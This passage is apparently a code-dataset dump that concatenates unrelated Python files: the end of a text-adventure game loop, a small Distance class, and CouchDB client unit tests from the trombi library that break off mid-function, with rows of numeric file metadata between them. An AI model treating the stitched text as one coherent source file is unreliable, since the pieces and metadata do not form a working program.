            if link["linkText"] != "SECRET":
                print(link["linkText"])
def get_input():
    """Prompt the player and normalize the response for link matching."""
    response = input("What do you want to do? ")
    response = response.upper().strip()
    return response
def update(current_location, location_label, response):
    """Return the next passage name for the player's response.

    An empty response (the first pass through the loop) or an
    unrecognized command leaves the player where they are.
    """
    if response == "":
        return location_label
    if "links" in current_location:
        for link in current_location["links"]:
            if link["linkText"] == response:
                return link["passageName"]
    print("I don't understand what you are trying to do. Try again.")
    return location_label
# ----------------------------------------------------------------
location_label = "Bedroom"
current_location = {}
response = ""
score = 0
moves = 0
while True:
    if response == "QUIT":
        break
    moves += 1
    previous_label = location_label
    location_label = update(current_location, location_label, response)
    current_location = find_current_location(location_label)
    # Apply a passage's score only when the player actually moves, so an
    # unrecognized command can't re-apply the current passage's score.
    if location_label != previous_label and "score" in current_location:
        score += current_location["score"]
    render(current_location, score, moves)
    response = get_input()
print("Thanks for playing!")
| 69.153279 | 1,324 | 0.651333 | 12,786 | 84,367 | 4.295401 | 0.100501 | 0.00721 | 0.014858 | 0.013255 | 0.859981 | 0.855939 | 0.850731 | 0.846507 | 0.846507 | 0.844941 | 0 | 0.00525 | 0.239181 | 84,367 | 1,220 | 1,325 | 69.153279 | 0.850377 | 0.003224 | 0 | 0.3597 | 0 | 0.105745 | 0.808446 | 0.049137 | 0 | 0 | 0 | 0 | 0.000833 | 1 | 0.003331 | false | 0.085762 | 0.004163 | 0 | 0.01249 | 0.007494 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
2a8725cd14056eca9aaf82f98e1d0bececf67330 | 267 | py | Python | backend/venue_service/api/venue/models/distance.py | ktodorov/aed-2018 | 337a8df6d2239d35432663e1b340977b3bfba4ae | ["MIT"] | null | null | null | backend/venue_service/api/venue/models/distance.py | ktodorov/aed-2018 | 337a8df6d2239d35432663e1b340977b3bfba4ae | ["MIT"] | null | null | null | backend/venue_service/api/venue/models/distance.py | ktodorov/aed-2018 | 337a8df6d2239d35432663e1b340977b3bfba4ae | ["MIT"] | null | null | null |
class Distance:
    """A travel distance expressed as kilometers and minutes."""

    def __init__(self, kilometers, minutes):
        self.kilometers = kilometers
        self.minutes = minutes

    def toJson(self):
        # Return a plain dict, ready to be serialized as JSON.
        return {"kilometers": self.kilometers, "minutes": self.minutes}
| 26.7 | 75 | 0.632959 | 29 | 267 | 5.689655 | 0.344828 | 0.254545 | 0.254545 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020305 | 0.262172 | 267 | 10 | 75 | 26.7 | 0.817259 | 0 | 0 | 0 | 0 | 0 | 0.063433 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.125 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
aa51036c2107182924e8e93507c42ad5602d53ad | 43,627 | py | Python | test/test_client.py | nailor/trombi | a0a761b45abc6b22b45253cba1962f09173ffd37 | ["MIT"] | 1 | 2020-12-29T06:05:46.000Z | 2020-12-29T06:05:46.000Z | test/test_client.py | nailor/trombi | a0a761b45abc6b22b45253cba1962f09173ffd37 | ["MIT"] | null | null | null | test/test_client.py | nailor/trombi | a0a761b45abc6b22b45253cba1962f09173ffd37 | ["MIT"] | null | null | null |
# Copyright (c) 2011 Jyrki Pulliainen <jyrki@dywypi.org>
# Copyright (c) 2010 Inoi Oy
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import with_statement
from datetime import datetime
from nose.tools import eq_ as eq
from couch_util import setup, teardown, with_couchdb
from util import with_ioloop, DatetimeEncoder
try:
import json
except ImportError:
import simplejson as json
import urllib
import trombi
import trombi.errors
def test_from_uri():
db = trombi.from_uri('http://1.2.3.4/foobar')
assert isinstance(db.server, trombi.Server)
eq(db.baseurl, 'http://1.2.3.4/foobar')
eq(db.name, 'foobar')
db = trombi.from_uri('http://1.2.3.4:1122/foobar/')
assert isinstance(db.server, trombi.Server)
eq(db.baseurl, 'http://1.2.3.4:1122/foobar')
eq(db.name, 'foobar')
@with_ioloop
def test_cannot_connect(ioloop):
def create_callback(db):
eq(db.error, True)
eq(db.errno, 599)
eq(db.msg, 'Unable to connect to CouchDB')
ioloop.stop()
s = trombi.Server('http://localhost:39998', io_loop=ioloop)
s.create('couchdb-database', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_db(baseurl, ioloop):
def create_callback(db):
eq(db.error, False)
assert isinstance(db, trombi.Database)
f = urllib.urlopen('%s_all_dbs' % baseurl)
assert 'couchdb-database' in json.load(f)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('couchdb-database', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_db_exists(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def first_callback(db):
s.create(
'couchdb-database',
callback=callback,
)
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.PRECONDITION_FAILED)
eq(result.msg, "Database already exists: 'couchdb-database'")
f = urllib.urlopen('%s_all_dbs' % baseurl)
assert 'couchdb-database' in json.load(f)
ioloop.stop()
s.create('couchdb-database', callback=first_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_invalid_db_name(baseurl, ioloop):
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.INVALID_DATABASE_NAME)
eq(result.msg, "Invalid database name: 'this name is invalid'")
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('this name is invalid', callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_create_doesnt_yet_exist(baseurl, ioloop):
def callback(db):
eq(db.error, False)
eq(db.name, 'nonexistent')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.get('nonexistent', create=True, callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_create_already_exists(baseurl, ioloop):
def create_callback(db):
eq(db.name, 'new')
s.get('new', create=True, callback=get_callback)
def get_callback(db):
eq(db.error, False)
eq(db.name, 'new')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('new', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_db(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def create_callback(db):
s.delete('testdatabase', callback=delete_callback)
def delete_callback(result):
eq(result.error, False)
f = urllib.urlopen('%s_all_dbs' % baseurl)
eq([x for x in json.load(f) if not x.startswith('_')], [])
ioloop.stop()
s.create('testdatabase', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_db_not_exists(baseurl, ioloop):
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, "Database does not exist: 'testdatabase'")
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.delete('testdatabase', callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_list_databases(baseurl, ioloop):
def create_first(db):
s.create('testdb2', callback=create_second)
def create_second(db):
s.list(callback=list_callback)
def list_callback(databases):
databases = list(databases)
assert all(isinstance(x, trombi.Database) for x in databases)
eq(
set(['testdb2', 'testdb1']),
set([x.name for x in databases if not x.name.startswith('_')]),
)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb1', callback=create_first)
ioloop.start()
@with_ioloop
@with_couchdb
def test_open_database(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def create_callback(db):
s.get('testdb1', callback=get_callback)
def get_callback(db):
eq(db.error, False)
eq(db.name, 'testdb1')
eq(db.server, s)
ioloop.stop()
s.create('testdb1', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_open_nonexisting_database(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, "Database not found: testdb1")
ioloop.stop()
s.get('testdb1', callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_open_database_bad_name(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.INVALID_DATABASE_NAME)
eq(result.msg, "Invalid database name: 'not a valid name'")
ioloop.stop()
s.get('not a valid name', callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc['testvalue'], 'something')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
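
# ----------------------------------------------------------------
# Minimal usage sketch (not a test): the Server -> Database -> Document
# callback chain the surrounding tests exercise, run on a plain tornado
# IOLoop. The CouchDB URL, database name, and document body here are
# illustrative assumptions.
def _usage_sketch():
    import tornado.ioloop
    ioloop = tornado.ioloop.IOLoop.instance()
    server = trombi.Server('http://localhost:5984', io_loop=ioloop)

    def on_db(db):
        # get(..., create=True) behaves like get-or-create, as shown in
        # test_get_create_doesnt_yet_exist above.
        db.set('example-id', {'greeting': 'hello'}, on_doc)

    def on_doc(doc):
        assert not doc.error
        ioloop.stop()

    server.get('example-db', create=True, callback=on_db)
    ioloop.start()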
@with_ioloop
@with_couchdb
def test_create_document_with_slash(baseurl, ioloop):
def create_db_callback(db):
db.set(
'something/with/slash',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc.id, 'something/with/slash')
eq(doc['testvalue'], 'something')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_document(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
db.get(doc.id, callback=get_doc_callback)
def get_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc['testvalue'], 'something')
ioloop.stop()
db.set(
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_document_with_attachments(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
db.get(doc.id, callback=get_doc_callback, attachments=True)
def get_doc_callback(doc):
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc['testvalue'], 'something')
def _assert_on_fetch(*a, **kw):
assert False, 'Fetch detected, failing test!'
doc.db._fetch = _assert_on_fetch
doc.load_attachment('foo', got_attachment)
def got_attachment(data):
eq(data, 'bar')
ioloop.stop()
db.set(
{'testvalue': 'something'},
create_doc_callback,
attachments={'foo': (None, 'bar')}
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document_custom_id(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
eq(doc.id, 'testid')
assert '_id' not in doc
assert '_rev' not in doc
assert doc.rev
eq(doc['testvalue'], 'something')
f = urllib.urlopen('%stestdb/testid' % baseurl)
eq(json.load(f),
{'_id': 'testid',
'_rev': doc.rev,
'testvalue': 'something',
})
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_document(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
eq(db.error, False)
db.delete(doc, callback=delete_doc_callback)
def delete_doc_callback(db):
eq(db.error, False)
assert isinstance(db, trombi.Database)
ioloop.stop()
f = urllib.urlopen('%stestdb/testid' % baseurl)
eq(f.getcode(), 404)
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_document_not_existing(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
doc.id = 'wrongid'
db.delete(doc, callback=delete_doc_errback)
def delete_doc_errback(response):
eq(response.error, True)
eq(response.errno, trombi.errors.NOT_FOUND)
eq(response.msg, 'missing')
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_document_wrong_rev(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
doc.rev = '1-eabf'
db.delete(doc, callback=delete_doc_callback)
def delete_doc_callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.CONFLICT)
eq(result.msg, 'Document update conflict.')
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_document_invalid_rev(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
doc.rev = 'invalid'
db.delete(doc, callback=delete_doc_callback)
def delete_doc_callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.BAD_REQUEST)
eq(result.msg, 'Invalid rev format')
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document_custom_id_exists(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
db.set(
'testid',
{'testvalue': 'something'},
update_doc_error,
)
def update_doc_error(result):
eq(result.error, True)
eq(result.errno, trombi.errors.CONFLICT)
eq(result.msg, 'Document update conflict.')
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_update_document(baseurl, ioloop):
def do_test(db):
def update_doc(doc):
doc['newvalue'] = 'somethingelse'
db.set(doc, doc_updated)
def doc_updated(doc):
eq(doc, {
'testvalue': 'something',
'newvalue': 'somethingelse',
})
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
update_doc,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_set_document_change_id(baseurl, ioloop):
def do_test(db):
def update_doc(doc):
doc['newvalue'] = 'somethingelse'
db.set('otherid', doc, doc_updated)
def doc_updated(doc):
eq(doc, {
'testvalue': 'something',
'newvalue': 'somethingelse',
})
eq(doc.id, 'otherid')
# Check that the original didn't change
db.get('testid', check_original)
def check_original(doc):
eq(doc, {'testvalue': 'something'})
eq(doc.id, 'testid')
ioloop.stop()
db.set('testid', {'testvalue': 'something'}, update_doc)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_document_does_not_exist(baseurl, ioloop):
def create_db_callback(db):
db.get('foo', callback=get_callback)
def get_callback(doc):
eq(doc, None)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_save_attachment_inline(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
data_callback,
attachments={'foobar': (None, 'some textual data')},
)
def data_callback(doc):
f = urllib.urlopen('%stestdb/testid/foobar' % baseurl)
eq(f.read(), 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_save_attachment_inline_custom_content_type(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
data_callback,
attachments={'foobar':
('application/x-custom', 'some textual data')
},
)
def data_callback(doc):
f = urllib.urlopen('%stestdb/testid/foobar' % baseurl)
eq(f.info()['Content-Type'], 'application/x-custom')
eq(f.read(), 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_save_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
data = 'some textual data'
doc.attach('foobar', data, callback=data_callback)
def data_callback(doc):
f = urllib.urlopen('%stestdb/testid/foobar' % baseurl)
eq(f.read(), 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_save_attachment_wrong_rev(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
doc.rev = '1-deadbeef'
data = 'some textual data'
doc.attach('foobar', data, callback=data_callback)
def data_callback(doc):
eq(doc.error, True)
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
data = 'some textual data'
doc.attach('foobar', data, callback=attach_callback)
def attach_callback(doc):
doc.load_attachment('foobar', callback=data_callback)
def data_callback(data):
eq(data, 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_unknown_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
doc.load_attachment('foobar', callback=data_callback)
def data_callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, 'Document is missing attachment')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_inline_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
attach_callback,
attachments={'foobar': (None, 'some textual data')},
)
def attach_callback(doc):
doc.load_attachment('foobar', callback=data_callback)
def data_callback(data):
eq(data, 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_inline_attachment_no_fetch(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
attach_callback,
attachments={'foobar': (None, 'some textual data')},
)
def attach_callback(doc):
def _broken_fetch(*a, **kw):
assert False, 'Fetch called when not needed!'
doc.db._fetch = _broken_fetch
doc.load_attachment('foobar', callback=data_callback)
def data_callback(data):
eq(data, 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
data = 'some textual data'
doc.attach('foobar', data, callback=attach_callback)
def attach_callback(doc):
doc.delete_attachment('foobar', callback=delete_callback)
def delete_callback(doc):
f = urllib.urlopen('%stestdb/testid/foobar' % baseurl)
eq(f.getcode(), 404)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_attachment_wrong_rev(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
doc.rev = '1-deadwrong'
data = 'some textual data'
doc.attach('foobar', data, callback=attach_callback)
def attach_callback(doc):
eq(doc.error, True)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_empty_results(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.view('testview', 'all', load_view_cb)
def load_view_cb(result):
assert isinstance(result, trombi.ViewResult)
eq(result.error, False)
eq(len(result), 0)
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(null, doc) }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
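# Note: these view tests install design documents by PUTting raw JSON
# through the server's low-level _fetch helper rather than a public API,
# so the assertions exercise only the view-querying code path.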
@with_ioloop
@with_couchdb
def test_load_view_with_results(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.set({'data': 'data'}, create_doc_cb)
def create_doc_cb(doc):
db.view('testview', 'all', load_view_cb)
def load_view_cb(result):
eq(result.error, False)
eq(len(result), 1)
del result[0]['value']['_rev']
del result[0]['value']['_id']
del result[0]['id']
eq(list(result), [{'value': {'data': 'data'}, 'key': None}])
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(null, doc) }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_with_grouping_reduce(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.set({'data': 'data'}, create_1st_doc_cb)
def create_1st_doc_cb(doc):
db.set({'data': 'other'}, create_2nd_doc_cb)
def create_2nd_doc_cb(doc):
db.view('testview', 'all', load_view_cb, group=True)
def load_view_cb(result):
eq(result.error, False)
eq(list(result), [{'value': 1, 'key': 'data'},
{'value': 1, 'key': 'other'}])
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(doc.data, doc) }',
'reduce': 'function (key, value) { return \
value.length }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_with_keys(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.set({'data': 'data'}, create_1st_doc_cb)
def create_1st_doc_cb(doc):
db.set({'data': 'other'}, create_2nd_doc_cb)
def create_2nd_doc_cb(doc):
db.view('testview', 'all', load_view_cb, keys=['data'])
def load_view_cb(result):
eq(result.error, False)
eq(len(result), 1)
eq(result[0]['key'], 'data')
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(doc.data, doc) }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_no_design_doc(baseurl, ioloop):
def create_db_callback(db):
def load_view_cb(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, 'missing')
ioloop.stop()
db.view('testview', 'all', load_view_cb, group=True)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_no_such_view(baseurl, ioloop):
def do_test(db):
def create_view_callback(useless):
db.view('testview', 'all', load_view_cb)
def load_view_cb(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, 'missing_named_view')
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'foobar': {
'map': 'function (doc) { emit(doc.data, doc) }',
'reduce': 'function (key, value) { return \
value.length }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_temporary_view_empty_results(baseurl, ioloop):
def create_db_callback(db):
db.temporary_view(view_results, 'function(doc) { emit(null, doc); }')
def view_results(result):
assert isinstance(result, trombi.ViewResult)
eq(result.error, False)
eq(list(result), [])
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_temporary_view_no_such_db(baseurl, ioloop):
def view_results(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, 'no_db_file')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
db = trombi.Database(s, 'doesnotexist')
db.temporary_view(view_results, 'function() { emit(null);}')
ioloop.start()
@with_ioloop
@with_couchdb
def test_temporary_view_nonempty_results(baseurl, ioloop):
def do_test(db):
def doc_ready(doc):
db.temporary_view(view_results,
'function(doc) { emit(null, doc); }')
def view_results(results):
eq(len(results), 1)
result = results[0]
# Remove keys starting with _
eq(
dict((k, v) for k, v in result['value'].items()
if k[0] != '_'),
{'foo': 'bar'}
)
eq(result['key'], None)
ioloop.stop()
db.set('testid', {'foo': 'bar'}, doc_ready)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_temporary_view_with_reduce_fun(baseurl, ioloop):
def do_test(db):
def doc_ready(doc):
db.set({'value': 2}, doc2_ready)
def doc2_ready(doc):
db.temporary_view(
view_results,
map_fun='function(doc) { emit(null, doc.value); }',
reduce_fun='function(key, values) { return sum(values); }'
)
def view_results(result):
eq(result.error, False)
eq(list(result), [{'key': None, 'value': 3}])
ioloop.stop()
db.set({'value': 1}, doc_ready)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_document(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
doc.copy('newname', copy_done)
def copy_done(doc):
eq(doc.id, 'newname')
eq(dict(doc), {'testvalue': 'something'})
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
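# CouchDB implements document copying with a non-standard COPY HTTP method
# whose Destination header names the target id; copying onto an existing
# id without supplying its current revision produces a conflict, as the
# next test shows.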
@with_ioloop
@with_couchdb
def test_copy_document_exists(baseurl, ioloop):
def do_test(db):
def create_doc(doc):
db.set(
{'testvalue': 'something'},
copy_doc,
)
def copy_doc(doc):
doc.copy('newname', copy_done)
def copy_done(result):
eq(result.error, True)
eq(result.errno, trombi.errors.CONFLICT)
eq(result.msg, 'Document update conflict.')
ioloop.stop()
db.set('newname', {'something': 'else'}, create_doc)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_document_with_attachments(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
attachments={'foo': (None, 'bar')}
)
def create_doc_callback(doc):
doc.copy('newname', copy_done)
def copy_done(doc):
eq(doc.id, 'newname')
eq(dict(doc), {'testvalue': 'something'})
eq(doc.attachments.keys(), ['foo'])
eq(doc.attachments['foo']['content_type'], 'text/plain')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_loaded_document_with_attachments_false(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
attachments={'foo': (None, 'bar')}
)
def create_doc_callback(doc):
doc.db.get(doc.id, got_doc)
